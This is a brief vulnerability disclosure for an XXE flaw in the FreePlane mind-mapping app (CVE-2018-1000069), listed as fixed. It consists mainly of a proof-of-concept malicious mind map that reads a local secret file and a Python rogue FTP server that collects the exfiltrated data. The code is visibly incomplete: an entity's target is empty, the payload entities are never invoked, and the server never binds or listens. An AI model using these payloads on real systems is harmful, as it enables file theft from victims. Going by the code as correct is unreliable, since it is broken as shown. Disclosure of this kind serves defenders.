What FreePlane is? FreePlane is an open-source application intended for creating mind maps.


Vulnerability descripton: FreePlane is a Java-based app that loads its mind maps that are stored as simple XML files. The parser allowed to expand external entities that caused this vulnerability.

Results: When the victim opens a maliciously crafted mind map, any accessible by Java file can be sent to the attacker.

Proof of concept: Malicious mindmap:

<map version="freeplane 1.5.9">
<!DOCTYPE node [
<!ENTITY % start "<![CDATA[">
<!ENTITY % data SYSTEM "file:////path/secret_file.txt">
<!ENTITY % end "]]>">
<!ENTITY % all "%start;%data;%end;">
<!ENTITY % c "<!ENTITY send SYSTEM ';'>">
<!--To view this file, download free mind mapping software Freeplane from http://freeplane.sourceforge.net -->
<node TEXT="FreePlane PWNED" FOLDED="false" ID="ID_1702614147" CREATED="1488125426040" MODIFIED="1488125446531" STYLE="oval">
<node TEXT="Test" ID="ID_190033427" CREATED="1488125470150" MODIFIED="1488125471280"/>
<node TEXT="Test" ID="ID_935990512" CREATED="1488125471478" MODIFIED="1488125473816"/>

Simple FTP server:

from __future__ import print_function
import socket

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print('XXE-FTP listening')
conn,addr = s.accept()
conn.sendall('220 Staal XXE-FTP\r\n'.encode())
stop = False
while not stop:
    dp = str(conn.recv(1024))
    if dp.find("USER") > -1:
        conn.sendall("331 password please - version check\r\n".encode())
        conn.sendall("230 more data please!\r\n".encode())
    if dp.find("RETR")==0 or dp.find("QUIT")==0:
        stop = True
    if dp.find("CWD") > -1:
        print(dp.replace('CWD ','/',1).replace('\r\n',''),end='')
    if dp.find("RETR") > -1:
        print(dp.replace("RETR", '\033[92m[*] RECEIVED DATA\033[0m\r\n', 1))



Fixed - CVE-2018-1000069 freeplane